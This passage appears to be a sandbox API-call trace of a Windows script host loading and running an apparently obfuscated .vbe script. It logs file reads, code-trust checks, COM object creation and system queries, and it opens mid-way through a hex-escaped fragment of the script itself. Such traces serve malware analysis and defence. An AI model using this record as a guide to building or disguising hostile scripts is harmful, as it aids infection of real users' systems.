70\x6f\x6e\x73\x65\x20\x2b\x20\x22\x22\x20\x0d\x0a\x09\x09\x09\x7a\x61\x73\x64\x61\x73\x6f\x6d\x64\x73\x61\x69\x6e\x73\x28\x29\x0d\x0a") returned 7303 [0200.364] UnmapViewOfFile (lpBaseAddress=0x140000) returned 1 [0200.364] CloseHandle (hObject=0x110) returned 1 [0200.364] CloseHandle (hObject=0x10c) returned 1 [0200.364] GetSystemDirectoryA (in: lpBuffer=0x28eb48, uSize=0x0 | out: lpBuffer="") returned 0x14 [0200.364] ??2@YAPEAX_K@Z () returned 0x626ed0 [0200.364] GetSystemDirectoryA (in: lpBuffer=0x626ed0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0200.364] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefdbf0000 [0200.364] ??3@YAXPEAX@Z () returned 0x721ee701 [0200.364] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferIdentifyLevel") returned 0x7fefdc0e470 [0200.364] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefdc0f9b0 [0200.364] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferCloseLevel") returned 0x7fefdc0f660 [0200.364] IdentifyCodeAuthzLevelW () returned 0x1 [0205.754] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28dcc0 | out: lpSystemTimeAsFileTime=0x28dcc0*(dwLowDateTime=0x2dbd68e0, dwHighDateTime=0x1d4ff41)) [0205.754] GetCurrentProcessId () returned 0xb40 [0205.754] GetCurrentThreadId () returned 0xb44 [0205.754] GetTickCount () returned 0x3840d [0205.754] QueryPerformanceCounter (in: lpPerformanceCount=0x28dcc8 | out: lpPerformanceCount=0x28dcc8*=27920497357) returned 1 [0205.754] malloc (_Size=0x100) returned 0x627670 [0205.754] GetVersionExA (in: lpVersionInformation=0x28daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf867f810, dwBuildNumber=0x7fe, dwPlatformId=0xf8670000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x28daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0205.754] GetUserDefaultLCID () returned 0x409 [0205.754] IsFileSupportedName () returned 0x1 [0205.754] _wcsicmp (_String1=".vbs", _String2=".vbe") returned 14 [0205.754] _wcsicmp (_String1=".vbe", _String2=".vbe") returned 0 [0205.758] GetSignedDataMsg () returned 0x0 [0205.759] GetCurrentProcess () returned 0xffffffffffffffff [0205.759] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x28e300, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28e300*=0x13c) returned 1 [0205.759] GetFileSize (in: hFile=0x13c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c87 [0205.759] ??2@YAPEAX_K@Z () returned 0x629a40 [0205.759] SetFilePointer (in: hFile=0x13c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.759] ReadFile (in: hFile=0x13c, lpBuffer=0x629a40, nNumberOfBytesToRead=0x1c87, lpNumberOfBytesRead=0x28e2e0, lpOverlapped=0x0 | out: lpBuffer=0x629a40*, lpNumberOfBytesRead=0x28e2e0*=0x1c87, lpOverlapped=0x0) returned 1 [0205.759] CoInitialize (pvReserved=0x0) returned 0x1 [0205.759] CoCreateInstance (in: rclsid=0x7fef867f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef867f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x28e250 | out: ppv=0x28e250*=0x62c0f0) returned 0x0 [0206.438] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28c450 | out: lpSystemTimeAsFileTime=0x28c450*(dwLowDateTime=0x2dfdae00, dwHighDateTime=0x1d4ff41)) [0206.438] GetCurrentProcessId () returned 0xb40 [0206.438] GetCurrentThreadId () returned 0xb44 [0206.438] GetTickCount () returned 0x385b2 [0206.438] QueryPerformanceCounter (in: lpPerformanceCount=0x28c458 | out: lpPerformanceCount=0x28c458*=27988934825) returned 1 [0206.438] malloc (_Size=0x100) returned 0x627780 [0206.439] __dllonexit () returned 0x7fef86214c0 [0206.439] __dllonexit () returned 0x7fef86214e8 [0206.439] GetVersionExA (in: lpVersionInformation=0x28c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf8622dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf86214e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x28c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0206.439] GetProcessWindowStation () returned 0x2c [0206.439] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x28c218, nLength=0xc, lpnLengthNeeded=0x28c210 | out: pvInfo=0x28c218, lpnLengthNeeded=0x28c210) returned 1 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b6d0 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b720 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b750 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b790 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b7d0 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b810 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b850 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b890 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b8d0 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b910 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b950 [0206.439] ??3@YAXPEAX@Z () returned 0x721ee701 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b9a0 [0206.439] ??2@YAPEAX_K@Z () returned 0x62b9e0 [0206.440] DllGetClassObject (in: rclsid=0x390ff0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefe436cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28cf20 | out: ppv=0x28cf20*=0x62b720) returned 0x0 [0206.440] ??2@YAPEAX_K@Z () returned 0x62b720 [0206.440] IClassFactory:CreateInstance (in: This=0x62b720, pUnkOuter=0x0, riid=0x28dd00*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x28cf40 | out: ppvObject=0x28cf40*=0x62c0f0) returned 0x0 [0206.440] ??2@YAPEAX_K@Z () returned 0x62bfe0 [0206.440] GetSystemInfo (in: lpSystemInfo=0x28cd80 | out: lpSystemInfo=0x28cd80*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0206.440] VirtualQuery (in: lpAddress=0x28cdf0, lpBuffer=0x28cdb0, dwLength=0x30 | out: lpBuffer=0x28cdb0*(BaseAddress=0x28c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0206.440] ??2@YAPEAX_K@Z () returned 0x62c020 [0206.440] ??2@YAPEAX_K@Z () returned 0x62c040 [0206.440] ??2@YAPEAX_K@Z () returned 0x62c0a0 [0206.441] ??2@YAPEAX_K@Z () returned 0x62c0d0 [0206.441] ??2@YAPEAX_K@Z () returned 0x62c180 [0206.441] IUnknown:AddRef (This=0x62c0f0) returned 0x2 [0206.441] IUnknown:Release (This=0x62c0f0) returned 0x1 [0206.441] IUnknown:Release (This=0x62b720) returned 0x0 [0206.441] ??3@YAXPEAX@Z () returned 0x721ee701 [0206.441] IUnknown:QueryInterface (in: This=0x62c0f0, riid=0x7fef867f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x28e188 | out: ppvObject=0x28e188*=0x62c0f0) returned 0x0 [0206.441] IUnknown:Release (This=0x62c0f0) returned 0x1 [0206.441] _strnicmp (_Str1="